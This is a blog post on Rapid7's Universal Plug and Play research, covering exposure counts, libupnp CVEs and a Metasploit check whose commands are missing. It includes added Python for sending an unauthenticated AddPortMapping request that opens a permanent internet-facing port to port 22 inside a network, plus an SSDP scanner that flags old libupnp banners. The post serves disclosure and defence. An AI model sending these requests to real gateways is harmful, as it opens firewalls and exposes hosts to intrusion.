This morning, Rapid7 released a whitepaper entitled Security Flaws in Universal Plug and Play. The paper is the result of a research project that identified over 80 million unique IPs responding to UPnP discovery requests from the internet; somewhere between 40 and 50 million of those IPs are vulnerable to at least one of the three attacks outlined in the paper.
In other words, according to the Rapid7 security team, UPnP support in routers and other common networking equipment leaves roughly 40 to 50 million devices worldwide open to remote compromise.
The UPnP SOAP service exposes device functions that should never be reachable from untrusted networks, including the ability to open holes through the firewall (for example, by adding port mappings on the gateway). Rapid7 estimates that approximately 17 million unique IPs expose the SOAP service to the public internet.
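To make the "open holes through the firewall" point concrete, here is an added example (not code from the Rapid7 paper or from this post) that builds the standard WANIPConnection:1 AddPortMapping SOAP call an attacker would send to an internet-exposed control service, and parses the gateway's answer for a UPnP error code. The control URL path, the sample hosts and the port numbers are placeholders chosen for the example; the argument names are the ones defined by the WANIPConnection service.

```python
"""Added example: what a UPnP AddPortMapping request looks like on the wire.

Not taken from the Rapid7 paper or this post. The hosts, ports and control
path used below are placeholders (assumptions), not values from the page.
"""
import socket
import sys
import xml.etree.ElementTree as ET
from typing import Optional
from xml.sax.saxutils import escape

SERVICE_TYPE = "urn:schemas-upnp-org:service:WANIPConnection:1"
ACTION = "AddPortMapping"


def build_soap_body(external_port: int, internal_client: str, internal_port: int,
                    protocol: str = "TCP", description: str = "example",
                    lease_seconds: int = 0) -> str:
    """Return the SOAP envelope for AddPortMapping.

    An empty NewRemoteHost means "any source on the internet", and a lease of
    0 means the mapping is permanent: exactly the hole the paper warns about.
    """
    if protocol not in ("TCP", "UDP"):
        raise ValueError("protocol must be TCP or UDP")
    args = [  # order follows the WANIPConnection:1 AddPortMapping definition
        ("NewRemoteHost", ""),
        ("NewExternalPort", str(external_port)),
        ("NewProtocol", protocol),
        ("NewInternalPort", str(internal_port)),
        ("NewInternalClient", internal_client),
        ("NewEnabled", "1"),
        ("NewPortMappingDescription", description),
        ("NewLeaseDuration", str(lease_seconds)),
    ]
    inner = "".join(f"<{k}>{escape(v)}</{k}>" for k, v in args)
    return (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        f'<s:Body><u:{ACTION} xmlns:u="{SERVICE_TYPE}">{inner}</u:{ACTION}>'
        "</s:Body></s:Envelope>"
    )


def build_http_request(host: str, port: int, control_path: str, body: str) -> bytes:
    """Wrap the SOAP body in the HTTP POST the control service expects."""
    payload = body.encode()
    headers = [
        f"POST {control_path} HTTP/1.1",
        f"Host: {host}:{port}",
        'Content-Type: text/xml; charset="utf-8"',
        f"Content-Length: {len(payload)}",
        f'SOAPAction: "{SERVICE_TYPE}#{ACTION}"',  # service#action, quoted
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(headers).encode() + payload


def soap_error_code(response_body: str) -> Optional[str]:
    """Return the UPnP errorCode from a SOAP fault, or None if there is none."""
    try:
        root = ET.fromstring(response_body)
    except ET.ParseError:
        return None
    for el in root.iter():
        if el.tag.endswith("errorCode"):
            return (el.text or "").strip()
    return None


def send(host: str, port: int, raw_request: bytes, timeout: float = 5.0) -> bytes:
    """Send the raw request over TCP and return the full response."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(raw_request)
        return b"".join(iter(lambda: s.recv(4096), b""))


if __name__ == "__main__":
    # usage: python addportmapping.py <gateway> <port> <control-path> <lan-client> [--send]
    # Without --send the request is only printed. Values are placeholders.
    host, port, path, client = sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4]
    req = build_http_request(host, port, path, build_soap_body(8080, client, 22))
    print(req.decode())
    if sys.argv[-1] == "--send":
        head, _, body = send(host, port, req).partition(b"\r\n\r\n")
        print(head.decode(errors="replace").splitlines()[0])
        print("errorCode:", soap_error_code(body.decode(errors="replace")))
```

A successful call returns an empty AddPortMappingResponse; a refusal comes back as a SOAP fault whose errorCode (718 ConflictInMappingEntry, for instance) is what `soap_error_code` extracts. Note that nothing in the request authenticates the caller, which is why reachability of the control URL from outside the LAN is the whole problem.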
The affected technology is the standard known as Universal Plug and Play (UPnP), a set of networking protocols that lets devices such as PCs, printers and Wi-Fi access points discover one another and communicate. After discovery, devices can use the network to share files, printing capability and the Internet connection.
Over 25% of all exposed SSDP services (approximately 23 million systems) are running the Portable SDK for UPnP Devices (libupnp), the software affected by the issues assigned the following CVEs: CVE-2012-5958, CVE-2012-5959, CVE-2012-5960, CVE-2012-5961, CVE-2012-5962, CVE-2012-5963, CVE-2012-5964, CVE-2012-5965
Testing for the UPnP Vulnerabilities using Metasploit
To run the check from the command line, first open the Metasploit console (msfconsole).
From the msf prompt, enter the following commands, substituting your own network range for the RHOSTS value.
Any devices supporting UPnP should appear, and those with at least one exploitable vulnerability are listed with the specific CVEs.
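The Metasploit check works by sending an SSDP M-SEARCH and inspecting the SERVER banner each device returns. The following added example (my own code, not part of this post or of Metasploit) does the same thing stand-alone: it sends the M-SEARCH, parses the responses, pulls the libupnp version out of the banner and flags anything older than the release that fixed the CVEs above. The fixed-version threshold of 1.6.18 and the treatment of the older "Intel SDK for UPnP devices" banner as the same code base are assumptions of this example, not facts stated on the page; the sample datagram at the bottom is constructed.

```python
"""Added example: SSDP discovery plus libupnp banner check.

Not code from this post or from Metasploit. Assumptions: libupnp 1.6.18 is
treated as the first fixed release, and "Intel SDK for UPnP devices" is
treated as the same code base under its older name.
"""
import re
import socket
import sys
from typing import Dict, List, Optional, Tuple

SSDP_ADDR = ("239.255.255.250", 1900)
MSEARCH = (
    "M-SEARCH * HTTP/1.1\r\n"
    "HOST: 239.255.255.250:1900\r\n"
    'MAN: "ssdp:discover"\r\n'
    "MX: 2\r\n"
    "ST: ssdp:all\r\n"
    "\r\n"
).encode()

LIBUPNP_FIXED = (1, 6, 18)  # assumption: first release without the CVEs above
LIBUPNP_RE = re.compile(
    r"(?:Portable|Intel) SDK for UPnP devices/(\d+)\.(\d+)\.(\d+)", re.IGNORECASE
)


def parse_headers(datagram: bytes) -> Dict[str, str]:
    """Turn an SSDP response into a lower-cased header dict (status line dropped)."""
    headers: Dict[str, str] = {}
    for line in datagram.decode("latin-1").split("\r\n")[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def libupnp_version(server_header: str) -> Optional[Tuple[int, int, int]]:
    """Extract the libupnp version advertised in a SERVER banner, if any."""
    m = LIBUPNP_RE.search(server_header)
    return tuple(int(x) for x in m.groups()) if m else None  # type: ignore[return-value]


def assess(datagram: bytes) -> Dict[str, object]:
    """Summarise one SSDP response and flag likely-affected libupnp builds."""
    h = parse_headers(datagram)
    server = h.get("server", "")
    ver = libupnp_version(server)
    return {
        "server": server,
        "location": h.get("location"),  # device description URL, used by the SOAP step
        "libupnp": ".".join(map(str, ver)) if ver else None,
        "likely_vulnerable": bool(ver and ver < LIBUPNP_FIXED),
    }


def discover(dest: Tuple[str, int] = SSDP_ADDR, timeout: float = 3.0) -> List[Tuple[str, Dict[str, object]]]:
    """Send one M-SEARCH (multicast on the LAN, or unicast to a single host) and collect replies."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    results = []
    try:
        sock.sendto(MSEARCH, dest)
        while True:
            data, (ip, _) = sock.recvfrom(65535)
            results.append((ip, assess(data)))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return results


# Constructed sample response (not captured from a real device).
SAMPLE = (
    b"HTTP/1.1 200 OK\r\n"
    b"CACHE-CONTROL: max-age=1800\r\n"
    b"EXT:\r\n"
    b"LOCATION: http://192.168.1.1:49152/rootDesc.xml\r\n"
    b"SERVER: Linux/2.6.21, UPnP/1.0, Portable SDK for UPnP devices/1.6.6\r\n"
    b"ST: upnp:rootdevice\r\n"
    b"USN: uuid:0f4e7c00-0000-0000-0000-000000000000::upnp:rootdevice\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    # usage: python ssdp_check.py            -> multicast on the local LAN
    #        python ssdp_check.py <ip>       -> unicast probe of one host (how
    #                                           internet-wide scans reach port 1900)
    if len(sys.argv) > 1:
        found = discover((sys.argv[1], 1900))
    else:
        found = discover()
    for ip, info in found or [("sample", assess(SAMPLE))]:
        print(ip, info)
```

The version check is only as good as the banner: a vendor that back-ported the fix without bumping the version string will show as vulnerable, and a device that strips the SERVER header will not be flagged at all, so treat "likely_vulnerable" as a prioritisation hint rather than proof.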
I started out developing HTML in 1996, and have been involved in web development ever since. The majority of my work is now spent in the security field, but I also try to carve out time for dance music. I'm not as involved as I used to be, but I still like to produce music. Check me out on iTunes or Beatport.